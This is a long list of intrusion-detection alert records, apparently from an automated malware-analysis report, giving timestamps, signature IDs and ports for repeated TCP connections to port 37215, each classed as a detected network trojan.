                Timestamp:06/14/24-10:43:34.661574
                SID:2835222
                Source Port:38104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520113
                SID:2829579
                Source Port:52116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672446
                SID:2829579
                Source Port:48480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010803
                SID:2835222
                Source Port:60686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028630
                SID:2835222
                Source Port:45650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849546
                SID:2829579
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325791
                SID:2835222
                Source Port:51904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200093
                SID:2835222
                Source Port:41874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230410
                SID:2835222
                Source Port:58278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718417
                SID:2835222
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989766
                SID:2835222
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021516
                SID:2835222
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134552
                SID:2829579
                Source Port:56158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671264
                SID:2829579
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342908
                SID:2835222
                Source Port:34626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804157
                SID:2835222
                Source Port:55034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703214
                SID:2829579
                Source Port:51232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737191
                SID:2829579
                Source Port:55172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545368
                SID:2835222
                Source Port:38246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831406
                SID:2829579
                Source Port:35984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857554
                SID:2835222
                Source Port:42080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932732
                SID:2829579
                Source Port:46728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343614
                SID:2835222
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764014
                SID:2835222
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133558
                SID:2835222
                Source Port:35538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343883
                SID:2835222
                Source Port:57450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152436
                SID:2829579
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729257
                SID:2835222
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943413
                SID:2835222
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760589
                SID:2835222
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473448
                SID:2829579
                Source Port:45702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762877
                SID:2835222
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367643
                SID:2829579
                Source Port:50846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183357
                SID:2835222
                Source Port:56154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878669
                SID:2835222
                Source Port:46198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028157
                SID:2829579
                Source Port:50676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716522
                SID:2829579
                Source Port:36358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091243
                SID:2835222
                Source Port:43848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775883
                SID:2829579
                Source Port:37286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291976
                SID:2829579
                Source Port:34890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830911
                SID:2835222
                Source Port:59380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910457
                SID:2835222
                Source Port:42952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734854
                SID:2835222
                Source Port:46362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146377
                SID:2835222
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365457
                SID:2829579
                Source Port:41934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164624
                SID:2835222
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242049
                SID:2835222
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915396
                SID:2835222
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701643
                SID:2829579
                Source Port:53912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384524
                SID:2829579
                Source Port:55578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001296
                SID:2835222
                Source Port:40010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729444
                SID:2835222
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023329
                SID:2835222
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184638
                SID:2835222
                Source Port:59294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245083
                SID:2829579
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056206
                SID:2829579
                Source Port:49876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013803
                SID:2829579
                Source Port:37852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024280
                SID:2829579
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806826
                SID:2835222
                Source Port:33550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449093
                SID:2835222
                Source Port:59250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023471
                SID:2835222
                Source Port:37628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915178
                SID:2835222
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163518
                SID:2835222
                Source Port:49386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777898
                SID:2835222
                Source Port:47278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808715
                SID:2835222
                Source Port:34082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185104
                SID:2835222
                Source Port:53434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737239
                SID:2829579
                Source Port:33638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882292
                SID:2835222
                Source Port:49908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143684
                SID:2835222
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545623
                SID:2835222
                Source Port:46808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646041
                SID:2835222
                Source Port:53680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679275
                SID:2835222
                Source Port:57878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:53.472391
                SID:2840516
                Source Port:23
                Destination Port:58432
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453054
                SID:2835222
                Source Port:50984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021239
                SID:2829579
                Source Port:38386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134582
                SID:2829579
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971262
                SID:2829579
                Source Port:41222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662651
                SID:2829579
                Source Port:46510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411579
                SID:2835222
                Source Port:52958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.447992
                SID:2829579
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702509
                SID:2829579
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382409
                SID:2829579
                Source Port:39234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150324
                SID:2835222
                Source Port:49616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763051
                SID:2829579
                Source Port:40386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805790
                SID:2835222
                Source Port:59672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916361
                SID:2835222
                Source Port:55688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057191
                SID:2835222
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365029
                SID:2829579
                Source Port:58048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808044
                SID:2835222
                Source Port:39724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675819
                SID:2835222
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811335
                SID:2835222
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763662
                SID:2829579
                Source Port:46862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978843
                SID:2829579
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178672
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015154
                SID:2829579
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779535
                SID:2835222
                Source Port:57904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022788
                SID:2835222
                Source Port:37664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150058
                SID:2829579
                Source Port:51986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807207
                SID:2835222
                Source Port:53136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073753
                SID:2829579
                Source Port:44562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717107
                SID:2829579
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568764
                SID:2829579
                Source Port:50712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324629
                SID:2829579
                Source Port:38022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980553
                SID:2835222
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805720
                SID:2835222
                Source Port:33282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789773
                SID:2829579
                Source Port:43618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412349
                SID:2835222
                Source Port:56364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803873
                SID:2835222
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133324
                SID:2829579
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421816
                SID:2829579
                Source Port:47400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663470
                SID:2835222
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990711
                SID:2835222
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850178
                SID:2829579
                Source Port:52332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704390
                SID:2829579
                Source Port:58388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295236
                SID:2829579
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942119
                SID:2829579
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849802
                SID:2835222
                Source Port:51890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766810
                SID:2829579
                Source Port:57810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879002
                SID:2835222
                Source Port:58760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917617
                SID:2835222
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543677
                SID:2829579
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688666
                SID:2835222
                Source Port:60562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273135
                SID:2829579
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243219
                SID:2835222
                Source Port:33556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023553
                SID:2835222
                Source Port:59920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807740
                SID:2835222
                Source Port:41386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662475
                SID:2835222
                Source Port:47124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806088
                SID:2835222
                Source Port:56266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662368
                SID:2835222
                Source Port:60112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019663
                SID:2829579
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775831
                SID:2829579
                Source Port:58240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021140
                SID:2829579
                Source Port:37624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681939
                SID:2829579
                Source Port:49174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862218
                SID:2829579
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776454
                SID:2835222
                Source Port:50108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013983
                SID:2835222
                Source Port:45582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324910
                SID:2835222
                Source Port:40334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.336602
                SID:2829579
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544270
                SID:2829579
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718951
                SID:2829579
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452756
                SID:2829579
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791925
                SID:2835222
                Source Port:52168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134279
                SID:2835222
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670997
                SID:2835222
                Source Port:56472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368461
                SID:2835222
                Source Port:51482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791695
                SID:2829579
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862518
                SID:2829579
                Source Port:35228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666047
                SID:2835222
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809931
                SID:2829579
                Source Port:57676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733595
                SID:2835222
                Source Port:60396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013316
                SID:2829579
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186126
                SID:2835222
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504245
                SID:2835222
                Source Port:37296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383429
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846796
                SID:2835222
                Source Port:57262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020565
                SID:2829579
                Source Port:52572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420571
                SID:2835222
                Source Port:57788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027057
                SID:2835222
                Source Port:55464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277689
                SID:2829579
                Source Port:33274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759223
                SID:2835222
                Source Port:35992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029492
                SID:2829579
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723714
                SID:2835222
                Source Port:60640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618619
                SID:2835222
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941999
                SID:2835222
                Source Port:45442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968527
                SID:2829579
                Source Port:55546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451513
                SID:2835222
                Source Port:37006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906451
                SID:2835222
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518710
                SID:2835222
                Source Port:60332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133524
                SID:2829579
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988063
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344263
                SID:2835222
                Source Port:59288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858919
                SID:2835222
                Source Port:52676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685062
                SID:2829579
                Source Port:47744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002097
                SID:2835222
                Source Port:36204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760725
                SID:2835222
                Source Port:54530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.767021
                SID:2829579
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229925
                SID:2829579
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641138
                SID:2829579
                Source Port:53246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676987
                SID:2835222
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716393
                SID:2835222
                Source Port:35528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915143
                SID:2835222
                Source Port:46600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290420
                SID:2835222
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079391
                SID:2829579
                Source Port:33248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452805
                SID:2829579
                Source Port:49212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944747
                SID:2835222
                Source Port:32842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967774
                SID:2829579
                Source Port:49182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338345
                SID:2829579
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724456
                SID:2829579
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762537
                SID:2835222
                Source Port:45706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407750
                SID:2835222
                Source Port:55498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180014
                SID:2835222
                Source Port:45692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412319
                SID:2829579
                Source Port:45188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471414
                SID:2835222
                Source Port:33384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160455
                SID:2835222
                Source Port:37344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700909
                SID:2829579
                Source Port:46328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988811
                SID:2829579
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150785
                SID:2835222
                Source Port:55738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133878
